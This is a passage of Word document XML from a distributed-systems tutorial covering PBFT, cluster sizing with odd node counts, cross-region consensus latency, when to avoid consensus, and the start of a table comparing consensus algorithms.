        <w:t>PBFT (Castro &amp; Liskov, 1999):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717063F3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Tolerates f byzantine faults with 3f+1 nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7623A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  3 phases: Pre-Prepare → Prepare → Commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39403C23" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="704FE84C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Simplified flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448FA6CB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  1. Client sends request to primary (leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE84E6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  2. Primary assigns sequence number, broadcasts PRE-PREPARE to all replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D4C84" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  3. Replicas validate and broadcast PREPARE to all other replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD1913" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  4. When 2f+1 matching PREPAREs received → broadcast COMMIT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA7E5CA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  5. When 2f+1 matching COMMITs received → execute and reply to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2741D5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  6. Client waits for f+1 matching replies (from different replicas) → accepts result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66158535" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="62A433C5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Communication complexity: O(n²) messages per consensus round.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5062ED86" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  4 nodes: 16 messages per consensus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F092A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  7 nodes: 49 messages per consensus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F8824" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  → Doesn't scale well beyond ~20 nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D26BEE5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="5B2906BF">
          <v:rect id="_x0000_i6250" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42762DA9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Consensus in Practice — Design Decisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC27766" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 How Many Nodes?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98"/>
        <w:gridCol w:w="2148"/>
        <w:gridCol w:w="3899"/>
      </w:tblGrid>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="523F769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6B5714" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nodes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F857A2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Crash Tolerance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46B2A0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Typical Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="2AA6143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B68B13" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">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024585" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>1 failure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31F58E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Development, small production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="1A906CB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6159D7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">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C0763A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>2 failures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848933" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Standard production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="1412D45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A7F782" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:lastRenderedPageBreak/>
              <w:t>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CF0B33" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>3 failures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ED5642" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Critical systems, large geo-spread</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="316876C1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA09498" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Why 3 or 5 (not 4 or 6)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7153D4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Even numbers don't improve fault tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA99FDD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    3 nodes: tolerates 1 failure (majority = 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1266D5CD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    4 nodes: STILL tolerates only 1 failure (majority = 3, if 2 fail → no majority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24DE56" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    5 nodes: tolerates 2 failures (majority = 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377239F2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    6 nodes: STILL tolerates only 2 failures (majority = 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3425D54D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74C364" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Even numbers waste a node without improving tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7893B1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Always use odd numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6C844" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Cross-Region Consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD9FD0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E8B080" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3 nodes in 3 regions (US-East, US-West, EU):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7F259" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Write latency: max RTT to closest majority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA8FDA0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  If leader in US-East:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416ACEF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    US-East → US-West: 60ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F4FD13" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    US-East → EU: 80ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759DC134" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Majority = self + US-West: 60ms write latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4009D91C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DACC54" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Reads from US-East: 0ms (leader is local).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DDA574" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Reads from EU: 80ms (if linearizable — must ask leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A214569" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="097080B3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>5 nodes in 3 regions (2 US-East, 2 US-West, 1 EU):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C06054E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Leader in US-East: majority = 2 local + 1 US-West = 60ms write latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E06569B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Better than waiting for EU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643546E8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE20E0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Placement strategy: Put majority of replicas in/near the region where writes originate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C700F1C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 When NOT to Use Consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02008802" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E583E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Consensus is EXPENSIVE (coordination on every write). Don't use it when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493C201C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="22A8BDFF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>1. Eventual consistency is acceptable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DA1B9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Use async replication (faster writes, higher availability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8217FD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDF2053" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>2. Single-leader with async replicas suffices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7DAB5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Regular primary-replica replication (PostgreSQL streaming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE2154" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Simpler, faster, good enough for most applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11699C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D5433" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3. Only coordination is needed (not full state replication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C63E9CB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Use a consensus service (etcd, ZooKeeper) for coordination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CCC3D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Use a regular database for data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3604228B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ADF501" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>4. Data is partitioned and each partition is independent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CFE48" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → Consensus per partition (like CockroachDB ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3DE9B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   → NOT global consensus across all data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FC0F8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="526AA9DB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Rule of thumb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61032680" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Use consensus for: metadata, coordination, leader election, configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8E493" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Avoid consensus for: high-throughput user data (use async replication + app-level consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195C0B5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="4FF4ABCC">
          <v:rect id="_x0000_i6251" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="390EA969" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Comparison of Consensus Algorithms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37"/>
        <w:gridCol w:w="1277"/>
        <w:gridCol w:w="1143"/>
        <w:gridCol w:w="2043"/>
        <w:gridCol w:w="1490"/>
        <w:gridCol w:w="1760"/>
      </w:tblGrid>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="56B595B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85E9D4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Algorithm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6824D5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Fault Model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59EFC6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nodes Needed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505B17" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Messages/Round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C36B3B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Complexity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F58329" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Used By</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="7A0A79E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3E1EF9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Paxos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36E97B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Crash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A80846" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>2f+1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52312F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>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35A40C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Very high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E3679B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Spanner, Chubby</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="4360E44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F36F87" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Multi-Paxos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0A7B5D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Crash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2B793A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
